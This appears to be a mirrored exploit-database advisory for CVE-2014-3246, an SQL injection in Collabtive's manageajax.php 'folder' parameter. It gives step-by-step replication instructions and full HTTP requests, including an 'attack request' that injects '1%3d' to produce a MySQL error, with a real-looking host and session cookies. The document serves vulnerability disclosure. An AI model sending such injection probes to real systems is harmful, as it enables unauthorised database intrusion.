Skip to content
cyberexploits
webappphptext

Collabtive 1.2 - SQL Injection

Collabtive 1.2 - SQL Injection

Published on 2014-05-08

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/33249.txt7eac4c3a
raw
Vulnerability title: SQL Injection / SQL Error message in Collabtive

application (CVE-2014-3246)

CVE: CVE-2014-3246 (cordinated with

Vendor: Collabtive

Product: Collabtive (Open Source Project Management Software)

Affected version: 1.12

Fixed version: 2.0

Reported by: Deepak Rathore

Severity: Critical

URL: http://[domain]/collabtive-12/managefile.php?action=showproject&id=2482

Affected Users: Authenticated users

Affected parameter(s): folder



Issue details: The folder parameter appears to be vulnerable to SQL

injection attacks. The payload 1%3d was submitted in the folder parameter,

and a database error message was returned. You should review the contents

of the error message, and the application's handling of other input, to

confirm whether a vulnerability is present.  The database appears to be

MySQL.



HTTP request:

GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1

Host: collabtive.o-dyn.de

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101

Firefox/29.0

Accept: text/javascript, text/html, application/xml, text/xml, */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

X-Prototype-Version: 1.6.0.3

Referer:

http://xxx/managefile.php?action=showproject&id=2482

Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;

PHPSESSID=ba83d29aab270a7926ea1be2e1f830be

Connection: keep-alive



Steps to replicate:

1. Login into application

2. Go to "Desktop" tab and click on "Add project"

3. Fill the project details in the project form and click on "Add" button

4. After creating a project go to "Files" tab and Intercept the request

5. At "manageajax.php" file, replace "folder" parameter value with "1%3d"

=====================

Original Request

=====================

GET /manageajax.php?action=fileview_list&id=2482&folder=0 HTTP/1.1

Host: collabtive.o-dyn.de

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101

Firefox/29.0

Accept: text/javascript, text/html, application/xml, text/xml, */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

X-Prototype-Version: 1.6.0.3

Referer:

http://xxx/managefile.php?action=showproject&id=2482

Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;

PHPSESSID=ba83d29aab270a7926ea1be2e1f830be

Connection: keep-alive

======================

Attack Request

======================

GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1

Host: collabtive.o-dyn.de

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101

Firefox/29.0

Accept: text/javascript, text/html, application/xml, text/xml, */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

X-Prototype-Version: 1.6.0.3

Referer:

http://xxx/managefile.php?action=showproject&id=2482

Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;

PHPSESSID=ba83d29aab270a7926ea1be2e1f830be

Connection: keep-alive

======================

6. Forward manipulated request to server and wait for response in browser

7. SQL Error message is the proof of vulnerability.



Tools used: Burp Suite proxy, Mozilla Firefox browser

View on GitHub